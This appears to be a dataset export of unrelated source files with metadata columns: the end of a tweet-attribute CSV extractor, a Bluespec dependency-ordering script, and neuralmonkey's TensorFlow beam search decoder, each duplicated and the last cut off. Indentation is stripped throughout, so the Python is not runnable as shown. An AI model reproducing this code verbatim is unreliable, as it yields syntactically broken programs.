for attribute in args.attributes:
item = attribute.getElement(json_object)
if len(item) == 0:
for row in found:
row.append("NA")
else:
found1 = []
for value in item:
if value is None:
value = "NA"
new = copy.deepcopy(found)
for row in new:
row.append(value)
found1.extend(new)
found = found1
for row in found:
csv_writer.writerow(row)
return len(found)
if __name__ == "__main__":
parser = argparse.ArgumentParser(description='Extracts attributes from tweets.')
parser.add_argument("attributes", nargs='*', help="Attributes to search for. Attributes inside nested inside other attributes should be seperated by a colon. Example: user:screen_name, entities:hashtags:text.")
parser.add_argument("-dialect", default="excel", help="Sets dialect for csv output. Defaults to excel. See python module csv.list_dialects()")
parser.add_argument("-string", default="", help="Regular expression for files to parse. Defaults to empty string.")
parser.add_argument("-path", default="./", help="Optional path to folder containing tweets. Defaults to current folder.")
parser.add_argument("-output", default="output.csv", help="Optional file to output results. Defaults to output.csv.")
parser.add_argument("-start", default="", help="Define start date for tweets. Format (mm:dd:yyyy)")
parser.add_argument("-end", default="", help="Define end date for tweets. Format (mm:dd:yyyy)")
parser.add_argument("-hashtag", default="", help="Define a hashtag that must be in parsed tweets.")
args = parser.parse_args()
if not args.path.endswith("/"):
args.path += "/"
args.start = strptime(args.start, '%m:%d:%Y') if args.start else False
args.end = strptime(args.end, '%m:%d:%Y') if args.end else False
args.attributes = [attriObject(i) for i in args.attributes]
args.string = re.compile(args.string)
args.hashtag = args.hashtag.lower()
parse(args) | pt | 0.112976 | 2.98681 | 3 |
scripts/bsvDeps.py | mhrtmnn/BSVTools | 7 | 13573 | #!/usr/bin/python3
import sys
import glob
import os
import re
def main():
directory = sys.argv[1]
builddir = sys.argv[2]
extra_module = ""
if(len(sys.argv) > 3):
extra_module = sys.argv[3]
projectModules = {}
for filename in glob.glob(os.path.join(directory, '*.bsv')):
m = re.match(".*/(.*).bsv", filename)
modName = m.group(1).strip()
projectModules[modName] = []
with open(filename, "r") as f:
for line in f:
if line.strip().startswith("import"):
m = re.match("import(.*)::", line.strip())
if m:
mod = m.group(1).strip()
if mod == "`RUN_TEST":
mod = extra_module
projectModules[modName].append(mod)
# Remove duplicates
for module, deps in projectModules.items():
projectModules[module] = list(set(deps))
# Remove non project Dependencies
for module, deps in projectModules.items():
old = list(deps)
for dep in old:
if not dep in projectModules:
deps.remove(dep)
# Create List of modules for dependency resolution
for m, d in projectModules.items():
print("{}/{}.bo: {}/{}.bsv {}".format(builddir, m, directory, m, " ".join(map(lambda x : "{}/{}.bo".format(builddir, x), d))))
depList = []
# Produce dependency list
while len(projectModules.keys()) > 0:
# Look for Module without dependency
found = False
for m, d in projectModules.items():
if not d:
found = True
depList.append(m)
del projectModules[m]
for _, d in projectModules.items():
if m in d:
d.remove(m)
break
if not found:
print("Loop detected")
break
depListFull = []
for d in depList:
d = builddir + "/" + d + ".bo"
depListFull.append(d)
t = "OBJS=" + " ".join(depListFull)
print(t)
if __name__ == '__main__':
main() | #!/usr/bin/python3
import sys
import glob
import os
import re
def main():
directory = sys.argv[1]
builddir = sys.argv[2]
extra_module = ""
if(len(sys.argv) > 3):
extra_module = sys.argv[3]
projectModules = {}
for filename in glob.glob(os.path.join(directory, '*.bsv')):
m = re.match(".*/(.*).bsv", filename)
modName = m.group(1).strip()
projectModules[modName] = []
with open(filename, "r") as f:
for line in f:
if line.strip().startswith("import"):
m = re.match("import(.*)::", line.strip())
if m:
mod = m.group(1).strip()
if mod == "`RUN_TEST":
mod = extra_module
projectModules[modName].append(mod)
# Remove duplicates
for module, deps in projectModules.items():
projectModules[module] = list(set(deps))
# Remove non project Dependencies
for module, deps in projectModules.items():
old = list(deps)
for dep in old:
if not dep in projectModules:
deps.remove(dep)
# Create List of modules for dependency resolution
for m, d in projectModules.items():
print("{}/{}.bo: {}/{}.bsv {}".format(builddir, m, directory, m, " ".join(map(lambda x : "{}/{}.bo".format(builddir, x), d))))
depList = []
# Produce dependency list
while len(projectModules.keys()) > 0:
# Look for Module without dependency
found = False
for m, d in projectModules.items():
if not d:
found = True
depList.append(m)
del projectModules[m]
for _, d in projectModules.items():
if m in d:
d.remove(m)
break
if not found:
print("Loop detected")
break
depListFull = []
for d in depList:
d = builddir + "/" + d + ".bo"
depListFull.append(d)
t = "OBJS=" + " ".join(depListFull)
print(t)
if __name__ == '__main__':
main() | pt | 0.196913 | 2.776094 | 3 |
neuralmonkey/decoders/beam_search_decoder.py | kasnerz/neuralmonkey | 0 | 13574 | <reponame>kasnerz/neuralmonkey<filename>neuralmonkey/decoders/beam_search_decoder.py<gh_stars>0
"""Beam search decoder.
This module implements the beam search algorithm for autoregressive decoders.
As any autoregressive decoder, this decoder works dynamically, which means
it uses the ``tf.while_loop`` function conditioned on both maximum output
length and list of finished hypotheses.
The beam search decoder uses four data strcutures during the decoding process.
``SearchState``, ``SearchResults``, ``BeamSearchLoopState``, and
``BeamSearchOutput``. The purpose of these is described in their own docstring.
These structures help the decoder to keep track of the decoding, enabling it
to be called e.g. during ensembling, when the content of the structures can be
changed and then fed back to the model.
The implementation mimics the API of the ``AutoregressiveDecoder`` class. There
are functions that prepare and return values that are supplied to the
``tf.while_loop`` function.
"""
# pylint: disable=too-many-lines
# Maybe move the definitions of the named tuple structures to a separate file?
from typing import Any, Callable, List, NamedTuple
# pylint: disable=unused-import
from typing import Optional
# pylint: enable=unused-import
import tensorflow as tf
from typeguard import check_argument_types
from neuralmonkey.decoders.autoregressive import (
AutoregressiveDecoder, LoopState)
from neuralmonkey.decorators import tensor
from neuralmonkey.model.model_part import ModelPart
from neuralmonkey.tf_utils import (
append_tensor, gather_flat, get_state_shape_invariants, partial_transpose,
get_shape_list)
from neuralmonkey.vocabulary import (
Vocabulary, END_TOKEN_INDEX, PAD_TOKEN_INDEX)
# Constant we use in place of the np.inf
INF = 1e9
class SearchState(NamedTuple(
"SearchState",
[("logprob_sum", tf.Tensor),
("prev_logprobs", tf.Tensor),
("lengths", tf.Tensor),
("finished", tf.Tensor)])):
"""Search state of a beam search decoder.
This structure keeps track of a current state of the beam search
algorithm. The search state contains tensors that represent hypotheses in
the beam, namely their log probability, length, and distribution over the
vocabulary when decoding the last word, as well as if the hypothesis is
finished or not.
Attributes:
logprob_sum: A ``(batch, beam)``-shaped tensor with the sums of token
log-probabilities of each hypothesis.
prev_logprobs: A ``(batch, beam, vocabulary)``-sized tensor. Stores
the log-distribution over the vocabulary from the previous decoding
step for each hypothesis.
lengths: A ``(batch, beam)``-shaped tensor with the lengths of the
hypotheses.
finished: A boolean tensor with shape ``(batch, beam)``. Marks finished
and unfinished hypotheses.
"""
class SearchResults(NamedTuple(
"SearchResults",
[("scores", tf.Tensor),
("token_ids", tf.Tensor)])):
"""The intermediate results of the beam search decoding.
A cummulative structure that holds the actual decoded tokens and hypotheses
scores (after applying a length penalty term).
Attributes:
scores: A ``(time, batch, beam)``-shaped tensor with the scores for
each hypothesis. The score is computed from the ``logprob_sum`` of
a hypothesis and accounting for the hypothesis length.
token_ids: A ``(time, batch, beam)``-shaped tensor with the vocabulary
indices of the tokens in each hypothesis.
"""
class BeamSearchLoopState(NamedTuple(
"BeamSearchLoopState",
[("search_state", SearchState),
("search_results", SearchResults),
("decoder_loop_state", LoopState)])):
"""The loop state of the beam search decoder.
A loop state object that is used for transferring data between cycles
through the symbolic while loop. It groups together the ``SearchState`` and
``SearchResults`` structures and also keeps track of the underlying decoder
loop state.
Attributes:
search_state: A ``SearchState`` object representing the current search
state.
search_results: The growing ``SearchResults`` object which accummulates
the outputs of the decoding process.
decoder_loop_state: The current loop state of the underlying
autoregressive decoder.
"""
class BeamSearchOutput(NamedTuple(
"BeamSearchOutput",
[("last_search_step_output", SearchResults),
("last_dec_loop_state", NamedTuple),
("last_search_state", SearchState),
("attention_loop_states", List[Any])])):
"""The final structure that is returned from the while loop.
Attributes:
last_search_step_output: A populated ``SearchResults`` object.
last_dec_loop_state: Final loop state of the underlying decoder.
last_search_state: Final loop state of the beam search decoder.
attention_loop_states: The final loop states of the attention objects.
"""
class BeamSearchDecoder(ModelPart):
"""In-graph beam search decoder.
The hypothesis scoring algorithm is taken from
https://arxiv.org/pdf/1609.08144.pdf. Length normalization is parameter
alpha from equation 14.
"""
def __init__(self,
name: str,
parent_decoder: AutoregressiveDecoder,
beam_size: int,
max_steps: int,
length_normalization: float) -> None:
"""Construct the beam search decoder graph.
Arguments:
name: The name for the model part.
parent_decoder: An autoregressive decoder from which to sample.
beam_size: The number of hypotheses in the beam.
max_steps: The maximum number of time steps to perform.
length_normalization: The alpha parameter from Eq. 14 in the paper.
"""
check_argument_types()
ModelPart.__init__(self, name)
self.parent_decoder = parent_decoder
self.beam_size = beam_size
self.length_normalization = length_normalization
self.max_steps_int = max_steps
# Create a placeholder for maximum number of steps that is necessary
# during ensembling, when the decoder is called repetitively with the
# max_steps attribute set to one.
self.max_steps = tf.placeholder_with_default(self.max_steps_int, [])
self._initial_loop_state = None # type: Optional[BeamSearchLoopState]
@tensor
def outputs(self) -> tf.Tensor:
# This is an ugly hack for handling the whole graph when expanding to
# the beam. We need to access all the inner states of the network in
# the graph, replace them with beam-size-times copied originals, create
# the beam search graph, and then replace the inner states back.
enc_states = self.parent_decoder.encoder_states
enc_masks = self.parent_decoder.encoder_masks
setattr(self.parent_decoder, "encoder_states",
lambda: [self.expand_to_beam(sts) for sts in enc_states()])
setattr(self.parent_decoder, "encoder_masks",
lambda: [self.expand_to_beam(mask) for mask in enc_masks()])
# Create the beam search symbolic graph.
with self.use_scope():
self._initial_loop_state = self.get_initial_loop_state()
outputs = self.decoding_loop()
# Reassign the original encoder states and mask back
setattr(self.parent_decoder, "encoder_states", enc_states)
setattr(self.parent_decoder, "encoder_masks", enc_masks)
return outputs
@property
def initial_loop_state(self) -> BeamSearchLoopState:
if self._initial_loop_state is None:
raise RuntimeError("Initial loop state was not initialized")
return self._initial_loop_state
@property
def vocabulary(self) -> Vocabulary:
return self.parent_decoder.vocabulary
# Note that the attributes search_state, decoder_state, and search_results
# are used only when ensembling, which is done with max_steps set to one
# and calling the beam search decoder repetitively.
@tensor
def search_state(self) -> SearchState:
return self.initial_loop_state.search_state
@tensor
def decoder_state(self) -> LoopState:
return self.initial_loop_state.decoder_loop_state
@tensor
def search_results(self) -> SearchResults:
return self.initial_loop_state.search_results
def get_initial_loop_state(self) -> BeamSearchLoopState:
"""Construct the initial loop state for the beam search decoder.
During the construction, the body function of the underlying decoder
is called once to retrieve the initial log probabilities of the first
token.
The values are initialized as follows:
- ``search_state``
- ``logprob_sum`` - For each sentence in batch, logprob sum of the
first hypothesis in the beam is set to zero while the others are
set to negative infinity.
- ``prev_logprobs`` - This is the softmax over the logits from the
initial decoder step.
- ``lengths`` - All zeros.
- ``finshed`` - All false.
- ``search_results``
- ``scores`` - A (batch, beam)-sized tensor of zeros.
- ``token_ids`` - A (1, batch, beam)-sized tensor filled with
indices of decoder-specific initial input symbols (usually start
symbol IDs).
- ``decoder_loop_state`` - The loop state of the underlying
autoregressive decoder, as returned from the initial call to the
body function.
Returns:
A populated ``BeamSearchLoopState`` structure.
"""
# Get the initial loop state of the underlying decoder. Then, expand
# the tensors from the loop state to (batch * beam) and inject them
# back into the decoder loop state.
dec_init_ls = self.parent_decoder.get_initial_loop_state()
feedables = tf.contrib.framework.nest.map_structure(
self.expand_to_beam, dec_init_ls.feedables)
histories = tf.contrib.framework.nest.map_structure(
lambda x: self.expand_to_beam(x, dim=1), dec_init_ls.histories)
constants = tf.constant(0)
if dec_init_ls.constants:
constants = tf.contrib.framework.nest.map_structure(
self.expand_to_beam, dec_init_ls.constants)
dec_init_ls = dec_init_ls._replace(
feedables=feedables,
histories=histories,
constants=constants)
# Call the decoder body function with the expanded loop state to get
# the log probabilities of the possible first tokens.
decoder_body = self.parent_decoder.get_body(False)
dec_next_ls = decoder_body(*dec_init_ls)
# Construct the initial loop state of the beam search decoder. To allow
# ensembling, the values are replaced with placeholders with a default
# value. Despite this is necessary only for variables that grow in
# time, the placeholder replacement is done on the whole structures, as
# you can see below.
search_state = SearchState(
logprob_sum=tf.tile(
tf.expand_dims([0.0] + [-INF] * (self.beam_size - 1), 0),
[self.batch_size, 1],
name="bs_logprob_sum"),
prev_logprobs=tf.reshape(
tf.nn.log_softmax(dec_next_ls.feedables.prev_logits),
[self.batch_size, self.beam_size, len(self.vocabulary)]),
lengths=tf.zeros(
[self.batch_size, self.beam_size], dtype=tf.int32,
name="bs_lengths"),
finished=tf.zeros(
[self.batch_size, self.beam_size], dtype=tf.bool))
# We add the input_symbol to token_ids during search_results
# initialization for simpler beam_body implementation
search_results = SearchResults(
scores=tf.zeros(
shape=[self.batch_size, self.beam_size],
dtype=tf.float32,
name="beam_scores"),
token_ids=tf.reshape(
feedables.input_symbol,
[1, self.batch_size, self.beam_size],
name="beam_tokens"))
# In structures that contain tensors that grow in time, we replace
# tensors with placeholders with loosened shape constraints in the time
# dimension.
dec_next_ls = tf.contrib.framework.nest.map_structure(
lambda x: tf.placeholder_with_default(
x, get_state_shape_invariants(x)),
dec_next_ls)
search_results = tf.contrib.framework.nest.map_structure(
lambda x: tf.placeholder_with_default(
x, get_state_shape_invariants(x)),
search_results)
return BeamSearchLoopState(
search_state=search_state,
search_results=search_results,
decoder_loop_state=dec_next_ls)
def loop_continue_criterion(self, *args) -> tf.Tensor:
"""Decide whether to break out of the while loop.
The criterion for stopping the loop is that either all hypotheses are
finished or a maximum number of steps has been reached. Here the number
of steps is the number of steps of the underlying decoder minus one,
because this function is evaluated after the decoder step has been
called and its step has been incremented. This is caused by the fact
that we call the decoder body function at the end of the beam body
function. (And that, in turn, is to support ensembling.)
Arguments:
args: A ``BeamSearchLoopState`` instance.
Returns:
A scalar boolean ``Tensor``.
"""
loop_state = BeamSearchLoopState(*args)
beam_step = loop_state.decoder_loop_state.feedables.step - 1
finished = loop_state.search_state.finished
max_step_cond = tf.less(beam_step, self.max_steps)
unfinished_cond = tf.logical_not(tf.reduce_all(finished))
return tf.logical_and(max_step_cond, unfinished_cond)
def decoding_loop(self) -> BeamSearchOutput:
"""Create the decoding loop.
This function mimics the behavior of the ``decoding_loop`` method of
the ``AutoregressiveDecoder``, except the initial loop state is created
outside this method because it is accessed and fed during ensembling.
TODO: The ``finalize_loop`` method and the handling of attention loop
states might be implemented in the future.
Returns:
This method returns a populated ``BeamSearchOutput`` object.
"""
final_loop_state = tf.while_loop(
self.loop_continue_criterion,
self.get_body(),
self.initial_loop_state,
shape_invariants=tf.contrib.framework.nest.map_structure(
get_state_shape_invariants, self.initial_loop_state))
# TODO: return att_loop_states properly
return BeamSearchOutput(
last_search_step_output=final_loop_state.search_results,
last_dec_loop_state=final_loop_state.decoder_loop_state,
last_search_state=final_loop_state.search_state,
attention_loop_states=[])
def get_body(self) -> Callable[[Any], BeamSearchLoopState]:
"""Return a body function for ``tf.while_loop``.
Returns:
A function that performs a single decoding step.
"""
decoder_body = self.parent_decoder.get_body(train_mode=False)
# pylint: disable=too-many-locals
def body(*args: Any) -> BeamSearchLoopState:
"""Execute a single beam search step.
An implementation of the beam search algorithm, which works as
follows:
1. Create a valid ``logprobs`` tensor which contains distributions
over the output tokens for each hypothesis in the beam. For
finished hypotheses, the log probabilities of all tokens except
the padding token are set to negative infinity.
2. Expand the beam by appending every possible token to every
existing hypothesis. Update the log probabilitiy sum of each
hypothesis and its length (add one for unfinished hypotheses).
For each hypothesis, compute the score using the length penalty
term.
3. Select the ``beam_size`` best hypotheses from the score pool.
This is implemented by flattening the scores tensor and using
the ``tf.nn.top_k`` function.
4. Reconstruct the beam by gathering elements from the original
data structures using the data indices computed in the previous
step.
5. Call the ``body`` function of the underlying decoder.
6. Populate a new ``BeamSearchLoopState`` object with the selected
values and with the newly obtained decoder loop state.
Note that this function expects the decoder to be called at least
once prior the first execution.
Arguments:
args: An instance of the ``BeamSearchLoopState`` structure.
(see the docs for this module)
Returns:
A ``BeamSearchLoopState`` after one step of the decoding.
"""
loop_state = BeamSearchLoopState(*args)
dec_loop_state = loop_state.decoder_loop_state
search_state = loop_state.search_state
search_results = loop_state.search_results
# mask the probabilities
# shape(logprobs) = [batch, beam, vocabulary]
logprobs = search_state.prev_logprobs
finished_mask = tf.expand_dims(
tf.to_float(search_state.finished), 2)
unfinished_logprobs = (1. - finished_mask) * logprobs
finished_row = tf.one_hot(
PAD_TOKEN_INDEX,
len(self.vocabulary),
dtype=tf.float32,
on_value=0.,
off_value=-INF)
finished_logprobs = finished_mask * finished_row
logprobs = unfinished_logprobs + finished_logprobs
# update hypothesis scores
# shape(hyp_probs) = [batch, beam, vocabulary]
hyp_probs = tf.expand_dims(search_state.logprob_sum, 2) + logprobs
# update hypothesis lengths
hyp_lengths = search_state.lengths + 1 - tf.to_int32(
search_state.finished)
# shape(scores) = [batch, beam, vocabulary]
scores = hyp_probs / tf.expand_dims(
self._length_penalty(hyp_lengths), 2)
# reshape to [batch, beam * vocabulary] for topk
scores_flat = tf.reshape(
scores, [-1, self.beam_size * len(self.vocabulary)])
# shape(both) = [batch, beam]
topk_scores, topk_indices = tf.nn.top_k(
scores_flat, k=self.beam_size)
topk_indices.set_shape([None, self.beam_size])
topk_scores.set_shape([None, self.beam_size])
next_word_ids = tf.mod(topk_indices, len(self.vocabulary))
next_beam_ids = tf.div(topk_indices, len(self.vocabulary))
# batch offset for tf.gather_nd
batch_offset = tf.tile(
tf.expand_dims(tf.range(self.batch_size), 1),
[1, self.beam_size])
batch_beam_ids = tf.stack([batch_offset, next_beam_ids], axis=2)
# gather the topk logprob_sums
next_beam_lengths = tf.gather_nd(hyp_lengths, batch_beam_ids)
next_beam_logprob_sum = tf.gather_nd(
tf.reshape(
hyp_probs, [-1, self.beam_size * len(self.vocabulary)]),
tf.stack([batch_offset, topk_indices], axis=2))
# mark finished beams
next_finished = tf.gather_nd(search_state.finished, batch_beam_ids)
next_just_finished = tf.equal(next_word_ids, END_TOKEN_INDEX)
next_finished = tf.logical_or(next_finished, next_just_finished)
# we need to flatten the feedables for the parent_decoder
next_feedables = tf.contrib.framework.nest.map_structure(
lambda x: gather_flat(x, batch_beam_ids,
self.batch_size, self.beam_size),
dec_loop_state.feedables)
next_feedables = next_feedables._replace(
input_symbol=tf.reshape(next_word_ids, [-1]),
finished=tf.reshape(next_finished, [-1]))
# histories have shape [len, batch, ...]
def gather_fn(x):
return partial_transpose(
gather_flat(
partial_transpose(x, [1, 0]),
batch_beam_ids,
self.batch_size,
self.beam_size),
[1, 0])
next_histories = tf.contrib.framework.nest.map_structure(
gather_fn, dec_loop_state.histories)
dec_loop_state = dec_loop_state._replace(
feedables=next_feedables,
histories=next_histories)
# CALL THE DECODER BODY FUNCTION
next_loop_state = decoder_body(*dec_loop_state)
next_search_state = SearchState(
logprob_sum=next_beam_logprob_sum,
prev_logprobs=tf.reshape(
tf.nn.log_softmax(next_loop_state.feedables.prev_logits),
[self.batch_size, self.beam_size, len(self.vocabulary)]),
lengths=next_beam_lengths,
finished=next_finished)
next_token_ids = tf.transpose(search_results.token_ids, [1, 2, 0])
next_token_ids = tf.gather_nd(next_token_ids, batch_beam_ids)
next_token_ids = tf.transpose(next_token_ids, [2, 0, 1])
next_output = SearchResults(
scores=topk_scores,
token_ids=append_tensor(next_token_ids, next_word_ids))
return BeamSearchLoopState(
search_state=next_search_state,
search_results=next_output,
decoder_loop_state=next_loop_state)
# pylint: enable=too-many-locals
return body
def _length_penalty(self, lengths: tf.Tensor) -> tf.Tensor:
"""Apply length penalty ("lp") term from Eq. 14.
https://arxiv.org/pdf/1609.08144.pdf
Arguments:
lengths: A ``Tensor`` of lengths of the hypotheses in the beam.
Returns:
A float ``Tensor`` with the length penalties for each hypothesis
in the beam.
"""
return ((5. + tf.to_float(lengths)) / 6.) ** self.length_normalization
def expand_to_beam(self, val: tf.Tensor, dim: int = 0) -> tf.Tensor:
"""Copy a tensor along a new beam dimension.
Arguments:
val: The ``Tensor`` to expand.
dim: The dimension along which to expand. Usually, the batch axis.
Returns:
The expanded tensor.
"""
orig_shape = get_shape_list(val)
if val.shape.ndims == 0:
return val
orig_shape[dim] *= self.beam_size
tile_shape = [1] * (len(orig_shape) + 1)
tile_shape[dim + 1] = self.beam_size
val = tf.tile(tf.expand_dims(val, 1), tile_shape)
val = tf.reshape(val, orig_shape)
return val
| """Beam search decoder.
This module implements the beam search algorithm for autoregressive decoders.
As any autoregressive decoder, this decoder works dynamically, which means
it uses the ``tf.while_loop`` function conditioned on both maximum output
length and list of finished hypotheses.
The beam search decoder uses four data strcutures during the decoding process.
``SearchState``, ``SearchResults``, ``BeamSearchLoopState``, and
``BeamSearchOutput``. The purpose of these is described in their own docstring.
These structures help the decoder to keep track of the decoding, enabling it
to be called e.g. during ensembling, when the content of the structures can be
changed and then fed back to the model.
The implementation mimics the API of the ``AutoregressiveDecoder`` class. There
are functions that prepare and return values that are supplied to the
``tf.while_loop`` function.
"""
# pylint: disable=too-many-lines
# Maybe move the definitions of the named tuple structures to a separate file?
from typing import Any, Callable, List, NamedTuple
# pylint: disable=unused-import
from typing import Optional
# pylint: enable=unused-import
import tensorflow as tf
from typeguard import check_argument_types
from neuralmonkey.decoders.autoregressive import (
AutoregressiveDecoder, LoopState)
from neuralmonkey.decorators import tensor
from neuralmonkey.model.model_part import ModelPart
from neuralmonkey.tf_utils import (
append_tensor, gather_flat, get_state_shape_invariants, partial_transpose,
get_shape_list)
from neuralmonkey.vocabulary import (
Vocabulary, END_TOKEN_INDEX, PAD_TOKEN_INDEX)
# Constant we use in place of the np.inf
INF = 1e9
class SearchState(NamedTuple(
"SearchState",
[("logprob_sum", tf.Tensor),
("prev_logprobs", tf.Tensor),
("lengths", tf.Tensor),
("finished", tf.Tensor)])):
"""Search state of a beam search decoder.
This structure keeps track of a current state of the beam search
algorithm. The search state contains tensors that represent hypotheses in
the beam, namely their log probability, length, and distribution over the
vocabulary when decoding the last word, as well as if the hypothesis is
finished or not.
Attributes:
logprob_sum: A ``(batch, beam)``-shaped tensor with the sums of token
log-probabilities of each hypothesis.
prev_logprobs: A ``(batch, beam, vocabulary)``-sized tensor. Stores
the log-distribution over the vocabulary from the previous decoding
step for each hypothesis.
lengths: A ``(batch, beam)``-shaped tensor with the lengths of the
hypotheses.
finished: A boolean tensor with shape ``(batch, beam)``. Marks finished
and unfinished hypotheses.
"""
class SearchResults(NamedTuple(
"SearchResults",
[("scores", tf.Tensor),
("token_ids", tf.Tensor)])):
"""The intermediate results of the beam search decoding.
A cummulative structure that holds the actual decoded tokens and hypotheses
scores (after applying a length penalty term).
Attributes:
scores: A ``(time, batch, beam)``-shaped tensor with the scores for
each hypothesis. The score is computed from the ``logprob_sum`` of
a hypothesis and accounting for the hypothesis length.
token_ids: A ``(time, batch, beam)``-shaped tensor with the vocabulary
indices of the tokens in each hypothesis.
"""
class BeamSearchLoopState(NamedTuple(
"BeamSearchLoopState",
[("search_state", SearchState),
("search_results", SearchResults),
("decoder_loop_state", LoopState)])):
"""The loop state of the beam search decoder.
A loop state object that is used for transferring data between cycles
through the symbolic while loop. It groups together the ``SearchState`` and
``SearchResults`` structures and also keeps track of the underlying decoder
loop state.
Attributes:
search_state: A ``SearchState`` object representing the current search
state.
search_results: The growing ``SearchResults`` object which accummulates
the outputs of the decoding process.
decoder_loop_state: The current loop state of the underlying
autoregressive decoder.
"""
class BeamSearchOutput(NamedTuple(
"BeamSearchOutput",
[("last_search_step_output", SearchResults),
("last_dec_loop_state", NamedTuple),
("last_search_state", SearchState),
("attention_loop_states", List[Any])])):
"""The final structure that is returned from the while loop.
Attributes:
last_search_step_output: A populated ``SearchResults`` object.
last_dec_loop_state: Final loop state of the underlying decoder.
last_search_state: Final loop state of the beam search decoder.
attention_loop_states: The final loop states of the attention objects.
"""
class BeamSearchDecoder(ModelPart):
"""In-graph beam search decoder.
The hypothesis scoring algorithm is taken from
https://arxiv.org/pdf/1609.08144.pdf. Length normalization is parameter
alpha from equation 14.
"""
def __init__(self,
name: str,
parent_decoder: AutoregressiveDecoder,
beam_size: int,
max_steps: int,
length_normalization: float) -> None:
"""Construct the beam search decoder graph.
Arguments:
name: The name for the model part.
parent_decoder: An autoregressive decoder from which to sample.
beam_size: The number of hypotheses in the beam.
max_steps: The maximum number of time steps to perform.
length_normalization: The alpha parameter from Eq. 14 in the paper.
"""
check_argument_types()
ModelPart.__init__(self, name)
self.parent_decoder = parent_decoder
self.beam_size = beam_size
self.length_normalization = length_normalization
self.max_steps_int = max_steps
# Create a placeholder for maximum number of steps that is necessary
# during ensembling, when the decoder is called repetitively with the
# max_steps attribute set to one.
self.max_steps = tf.placeholder_with_default(self.max_steps_int, [])
self._initial_loop_state = None # type: Optional[BeamSearchLoopState]
@tensor
def outputs(self) -> tf.Tensor:
# This is an ugly hack for handling the whole graph when expanding to
# the beam. We need to access all the inner states of the network in
# the graph, replace them with beam-size-times copied originals, create
# the beam search graph, and then replace the inner states back.
enc_states = self.parent_decoder.encoder_states
enc_masks = self.parent_decoder.encoder_masks
setattr(self.parent_decoder, "encoder_states",
lambda: [self.expand_to_beam(sts) for sts in enc_states()])
setattr(self.parent_decoder, "encoder_masks",
lambda: [self.expand_to_beam(mask) for mask in enc_masks()])
# Create the beam search symbolic graph.
with self.use_scope():
self._initial_loop_state = self.get_initial_loop_state()
outputs = self.decoding_loop()
# Reassign the original encoder states and mask back
setattr(self.parent_decoder, "encoder_states", enc_states)
setattr(self.parent_decoder, "encoder_masks", enc_masks)
return outputs
@property
def initial_loop_state(self) -> BeamSearchLoopState:
if self._initial_loop_state is None:
raise RuntimeError("Initial loop state was not initialized")
return self._initial_loop_state
@property
def vocabulary(self) -> Vocabulary:
return self.parent_decoder.vocabulary
# Note that the attributes search_state, decoder_state, and search_results
# are used only when ensembling, which is done with max_steps set to one
# and calling the beam search decoder repetitively.
@tensor
def search_state(self) -> SearchState:
return self.initial_loop_state.search_state
@tensor
def decoder_state(self) -> LoopState:
return self.initial_loop_state.decoder_loop_state
@tensor
def search_results(self) -> SearchResults:
return self.initial_loop_state.search_results
def get_initial_loop_state(self) -> BeamSearchLoopState:
"""Construct the initial loop state for the beam search decoder.
During the construction, the body function of the underlying decoder
is called once to retrieve the initial log probabilities of the first
token.
The values are initialized as follows:
- ``search_state``
- ``logprob_sum`` - For each sentence in batch, logprob sum of the
first hypothesis in the beam is set to zero while the others are
set to negative infinity.
- ``prev_logprobs`` - This is the softmax over the logits from the
initial decoder step.
- ``lengths`` - All zeros.
- ``finshed`` - All false.
- ``search_results``
- ``scores`` - A (batch, beam)-sized tensor of zeros.
- ``token_ids`` - A (1, batch, beam)-sized tensor filled with
indices of decoder-specific initial input symbols (usually start
symbol IDs).
- ``decoder_loop_state`` - The loop state of the underlying
autoregressive decoder, as returned from the initial call to the
body function.
Returns:
A populated ``BeamSearchLoopState`` structure.
"""
# Get the initial loop state of the underlying decoder. Then, expand
# the tensors from the loop state to (batch * beam) and inject them
# back into the decoder loop state.
dec_init_ls = self.parent_decoder.get_initial_loop_state()
feedables = tf.contrib.framework.nest.map_structure(
self.expand_to_beam, dec_init_ls.feedables)
histories = tf.contrib.framework.nest.map_structure(
lambda x: self.expand_to_beam(x, dim=1), dec_init_ls.histories)
constants = tf.constant(0)
if dec_init_ls.constants:
constants = tf.contrib.framework.nest.map_structure(
self.expand_to_beam, dec_init_ls.constants)
dec_init_ls = dec_init_ls._replace(
feedables=feedables,
histories=histories,
constants=constants)
# Call the decoder body function with the expanded loop state to get
# the log probabilities of the possible first tokens.
decoder_body = self.parent_decoder.get_body(False)
dec_next_ls = decoder_body(*dec_init_ls)
# Construct the initial loop state of the beam search decoder. To allow
# ensembling, the values are replaced with placeholders with a default
# value. Despite this is necessary only for variables that grow in
# time, the placeholder replacement is done on the whole structures, as
# you can see below.
search_state = SearchState(
logprob_sum=tf.tile(
tf.expand_dims([0.0] + [-INF] * (self.beam_size - 1), 0),
[self.batch_size, 1],
name="bs_logprob_sum"),
prev_logprobs=tf.reshape(
tf.nn.log_softmax(dec_next_ls.feedables.prev_logits),
[self.batch_size, self.beam_size, len(self.vocabulary)]),
lengths=tf.zeros(
[self.batch_size, self.beam_size], dtype=tf.int32,
name="bs_lengths"),
finished=tf.zeros(
[self.batch_size, self.beam_size], dtype=tf.bool))
# We add the input_symbol to token_ids during search_results
# initialization for simpler beam_body implementation
search_results = SearchResults(
scores=tf.zeros(
shape=[self.batch_size, self.beam_size],
dtype=tf.float32,
name="beam_scores"),
token_ids=tf.reshape(
feedables.input_symbol,
[1, self.batch_size, self.beam_size],
name="beam_tokens"))
# In structures that contain tensors that grow in time, we replace
# tensors with placeholders with loosened shape constraints in the time
# dimension.
dec_next_ls = tf.contrib.framework.nest.map_structure(
lambda x: tf.placeholder_with_default(
x, get_state_shape_invariants(x)),
dec_next_ls)
search_results = tf.contrib.framework.nest.map_structure(
lambda x: tf.placeholder_with_default(
x, get_state_shape_invariants(x)),
search_results)
return BeamSearchLoopState(
search_state=search_state,
search_results=search_results,
decoder_loop_state=dec_next_ls)
def loop_continue_criterion(self, *args) -> tf.Tensor:
"""Decide whether to break out of the while loop.
The criterion for stopping the loop is that either all hypotheses are
finished or a maximum number of steps has been reached. Here the number
of steps is the number of steps of the underlying decoder minus one,
because this function is evaluated after the decoder step has been
called and its step has been incremented. This is caused by the fact
that we call the decoder body function at the end of the beam body
function. (And that, in turn, is to support ensembling.)
Arguments:
args: A ``BeamSearchLoopState`` instance.
Returns:
A scalar boolean ``Tensor``.
"""
loop_state = BeamSearchLoopState(*args)
beam_step = loop_state.decoder_loop_state.feedables.step - 1
finished = loop_state.search_state.finished
max_step_cond = tf.less(beam_step, self.max_steps)
unfinished_cond = tf.logical_not(tf.reduce_all(finished))
return tf.logical_and(max_step_cond, unfinished_cond)
